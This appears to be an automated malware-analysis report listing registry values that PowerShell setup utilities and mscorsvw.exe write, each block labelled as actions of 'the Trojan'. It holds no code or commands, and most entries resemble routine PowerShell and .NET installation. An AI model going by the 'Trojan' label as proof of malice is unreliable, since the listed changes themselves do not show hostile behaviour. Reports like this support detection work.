[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3008 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 4F BF 81 95 38 E5 26 08 56 D1 00 2C D0 0A AA"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "6C 36 73 CC 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:3660 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 68 6E 8A 27 06 21 FC F5 4C E1 16 41 46 F0 16"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "70 FE 85 CF 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:3124 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 15 59 60 C8 29 CB A5 67 68 6C 5D BD 41 CA 62"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A6 09 E8 CC 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:2744 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 CA B4 37 56 9A B5 55 EC DE 9C AE 39 EF 77 14"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "B2 CC 65 CB 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:2968 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 23 9E 5D FF E9 B9 7D E9 CE 06 ED 4F 43 2C 67"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "80 D5 51 CC 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:3080 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 F0 CE BD 64 6E 04 69 E3 EB 94 7E 27 5A F5 90"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "14 0B C9 CC 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process PSCustomSetupUtil.exe:2620 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 5E EE 26 7E 53 8E 29 15 AB 1E 31 2B BB 73 AA"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "1E 97 EE CA 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:2768 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 A8 76 8C 49 76 EB D3 50 16 58 67 E0 A4 A5 7A"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "AC 54 8E CB 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:2876 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 1B 43 8C 36 3A DA 6D 3A A9 9E 3C B7 28 18 50"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "46 02 DD CB 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:2720 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 D2 20 17 47 3C 51 87 DA 1D FF 08 FD F9 17 20"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "12 A7 3F CB 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:2924 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 FD 03 E1 C0 8F 4D BC 29 0F 43 2D 4F 0C 70 9A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "E0 AF 2B CC 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:3708 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 B5 47 E9 0A EE 00 CA 8A 4E 64 A3 2E FB BF 09"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "EE 5D C6 CF 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:3800 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 ED 46 FF 7E 0D 5B 23 77 13 4A E9 66 E8 14 F9"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "4A F7 20 D0 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:3056 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 63 73 55 DE 97 39 76 57 A5 7B 6D DB CE 5B F6"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "DC 6E AC CC 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:2836 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 5B 1C 8B B1 70 C6 3F 58 B5 C3 94 12 AD 85 83"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "A6 DC B6 CB 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:3644 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B D4 09 3E 12 02 13 36 2D D2 5E 02 AB 33 3A 2F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2680 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 58 9A 78 FE 09 09 C0 2A 6E CB 61 E1 F3 88 70"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "18 1F 17 CB 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:3032 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 2F E1 7D C8 CC 73 87 1B AD 36 B2 30 00 E1 D0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A4 D2 8F CC 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process PSCustomSetupUtil.exe:3684 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 BA 61 6F FF 82 E7 72 73 67 60 56 AC 01 2E AE"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "02 FD A4 CF 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSSetupNativeUtils.exe:4084 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 8A 80 95 45 ED 2C 21 26 EA 21 31 45 3C 77 87"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process mscorsvw.exe:2596 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
